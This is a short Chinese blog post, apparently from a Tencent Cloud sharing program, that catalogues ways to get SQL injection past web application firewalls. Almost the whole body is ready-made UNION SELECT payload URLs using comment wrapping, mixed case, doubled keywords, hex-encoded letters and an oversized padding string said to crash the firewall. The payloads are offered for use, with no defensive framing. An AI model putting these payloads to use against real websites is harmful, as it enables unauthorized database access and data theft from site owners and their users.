sql注入基本简单绕过方法大全

基本/简单绕过方法:

  1、注释符

  http://www.*.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….

  2、使用大小写

  http://www.*.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….

  3、结合前面两种方法

  http://www.*.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….

  4、关键字替换

  http://www.*.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….

  5、内部注释

  http://www.*.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…

  U替换为%55,S替换为%53 在 union 和 select 之间添加注释/**/

高级绕过方法:

  1、缓冲区溢出/使防火墙崩溃

  大部分防火墙都是基于C/C++开发的,我们可以使用缓冲区溢出使用WAF崩溃

  http://www.*.com/index.php?page_id=-15+and+(select1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….

  你可以使用如下方法测试WAF

  ?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….

  如果返回500错误,你就可以使用缓冲区溢出的方法来绕过WAF

  2、对字母进行编码

  http://www.*.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….

  3、使用其他变量或者命令对注入语句进行替换

  COMMAND | WHAT TO USE INSTEAD

  @@version | version()

  concat() | concat_ws()

  group_concat() | concat_ws()

  4、利用WAF本身的功能绕过

  假如你发现WAF会把"*"替换为空,那么你就可以利用这一特性来进行绕过

  ‍‍‍‍‍‍‍‍http://www.*.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4....

  其它方法:-15+(uNioN)+(sElECt)….-15+(uNioN+SeleCT)+…-15+(UnI)(oN)+(SeL)(ecT)+….-15+union (select 1,2,3,4…)

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏信安之路

CTF 玩转 pwn 月度总结

自从加入 RTIS 交流群, 在 7o8v 师傅, gd 大佬 的帮助下, PWN 学习之路进入加速度. 下面是 8 周学习的总结, 基本上是按照how2hea...

22800
来自专栏JadePeng的技术博客

Angular快速学习笔记(4) -- Observable与RxJS

95620
来自专栏后端沉思录

JWT

上图文字来自https://jwt.io/introduction/ 现项目中的JWT来解析如下:

42020
来自专栏Jerry的SAP技术分享

MongoDB最简单的入门教程之三 使用Java代码往MongoDB里插入数据

如果您是基于Maven进行依赖管理的Java项目,只需要在您的pom.xml里加入下面的依赖定义,

11020
来自专栏.NET开发那点事

angularJS配合bootstrap动态加载弹出提示内容

1.bootstrp的弹出提示   bootstrap已经帮我们封装了非常好用的弹出提示Popover。   http://v3.bootcss.com/jav...

25770
来自专栏蜉蝣禅修之道

EJBCA使用之注册用户及创建证书

31340
来自专栏JavaEdge

Java并发编程实战系列5之基础构建模块

1 同步容器类 同步容器类包括Vector和HashTable,二者是早期JDK一部分,此外还包括在JDK 1.2中添加的一些功能相似的类,这些的同步封装器类是...

37750
来自专栏Kevin-ZhangCG

[ SSH框架 ] Struts2框架学习之二

  前面已经对 Struts2的流程已经执行完成了,但是如果表单中有参数如何进行接收又或者我们需要向页面保存一些数据,又要如何完成呢?我们可以通过学习 Stru...

9420
来自专栏木木玲

Netty 源码解析 ——— 服务端启动流程 (上)

31160
来自专栏码匠的流水账

聊聊新版JDK对docker容器的支持

即如果没有显式指定-XX:ParalllelGCThreads 或者 -XX:CICompilerCount, 那么JVM使用docker的cpu限制。如果do...

57610

扫码关注云+社区

领取腾讯云代金券